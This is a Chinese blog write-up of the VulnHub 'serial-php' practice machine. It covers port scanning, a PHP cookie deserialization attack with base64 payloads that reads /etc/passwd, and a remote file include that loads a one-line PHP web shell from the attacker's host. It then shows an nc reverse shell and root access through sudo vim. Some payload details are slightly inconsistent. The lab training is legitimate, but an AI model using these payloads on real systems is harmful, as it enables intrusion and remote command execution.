vulnhub靶场serial-php渗透(蜥蜴细!)

最新推荐文章于 2024-09-07 15:57:32 发布
最新推荐文章于 2024-09-07 15:57:32 发布
阅读量555 收藏 6
点赞数 9
文章标签: php android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140857377
版权

目录

一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

3.后台目录和端口扫描

4.解析bak.zip源码

二、漏洞利用

1.构造payload

2.通过bp的repeater模块

3.get shell

4.获取反弹shell

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功

一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,在首页中并未有任何有价值的信息

3.后台目录和端口扫描

开启80和22端口说明可能用到远程连接。

经过扫描后我们我们尝试访问扫描结果对应的目录,结果发现在/backup目录下存在压缩包

4.解析bak.zip源码

下载解压后,存有三个php文件

整理思路: 首次访问网站后,后台会创建一个user对象,并且内部又为wel变量创建welcome对象,同时进行序列化base64编码存入cookie,我们抓一下页面的包,发现cookie。

这里的cookie便是后台通过base64编码后的结果

使用base64解码后得到的结果

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}7

二、漏洞利用

1.构造payload

由于空格在url地址中无法识别,所以将所有空格转为8进制\x00 同时由于文件包含参数为type_log,所以内容应为文件路径

O:4:“User”:2:{s:10:“\x00User\x00name”;s:3:“sk4”;s:9:“\x00User\x00wel”;O:3:“Log”:1:{s:8:“type_log”;s:11:“/etc/passwd”}}

编码后的payload如下:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

2.通过bp的repeater模块

成功访问到信息,可以看到sk4用户属性为/bin/bash

3.get shell

1.构造序列化语句上传shell

<?php @system($_GET['cmd']);?>

2.然后构造payload:

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}}

然后进行序列化和base64编码执行。代码如下:

<?php
  class Log {
    private $type_log = "http://192.168.3.222/c.txt";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

64编码后的payload:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjU2LjEvc2hlbGwudHh0Ijt9fQ==

3.用burpsuite上传

成功执行一句话木马

4.获取反弹shell

直接使用nc工具来尝试回弹一个shell

在kali中使用nc监听7777端口等待靶机访问

成功回弹!!

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功

Meet.meet
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶场----10、LazySysadmin
七天
03-16 779
目录扫描:dirb、gobuster、dirsearch等工具;2、方法2:通过后台页面插入反弹shell脚本,获取权限,待补充。文件2:wp-config.php。web站点资产识别:goby、whatweb等;2.在404页面尝试插入反弹shell脚本。1、以上内容通过SSH获取到root权限。ssh爆破、有账号密码信息进行远程登录。1.利用获取到的用户名密码尝试登录。文件1:deets.txt。4.访问webshell。3、139.445端口。2.2、443端口探测。2.1、80端口探测。
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1392
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
VulnHub靶场---Empire-Lupin-One
qq_61670993的博客
10-20 843
小菜鸡一枚
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1093
小菜鸡一枚
Vulnhub靶场----9、DC-9
七天
03-03 781
Vulnhub-DC9
Vulnhub靶场渗透-zico2
paidx0
10-01 1268
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
Vulnhub靶场----2、DC-2
七天
02-21 572
Vulnhub-DC2
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2583
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub-serial-php-反序列化漏洞
末班车的博客
04-30 453
Vulnhub-serial-php-反序列化漏洞靶场渗透利用
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2947
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
攻防世界 Web_php_unserialize
最新发布
beiweixiaotian66的博客
09-07 281
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
从0开始的CTF个人练习生涯
CHTXRT的博客
09-03 359
就此离开,没人会受伤
ctfshow-php特性(web123-web150plus)
m0_72125469的博客
09-06 918
web123。
中间件解析漏洞
m0_73771249的博客
09-05 569
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
手动安装 composer.phar
昊喵喵博士
09-04 297
将 composer.phar 文件 放在你要安装的目录下 ,然后进入cmd命令框,输入以下命令就会多出一个 composer.bat 文件 代表安装成功。
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
PHP和Apache环境中部署sqli-labs是一个重要的步骤,它提供了实践SQL注入攻击防护的学习平台。...通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际环境中应用相应的防护策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值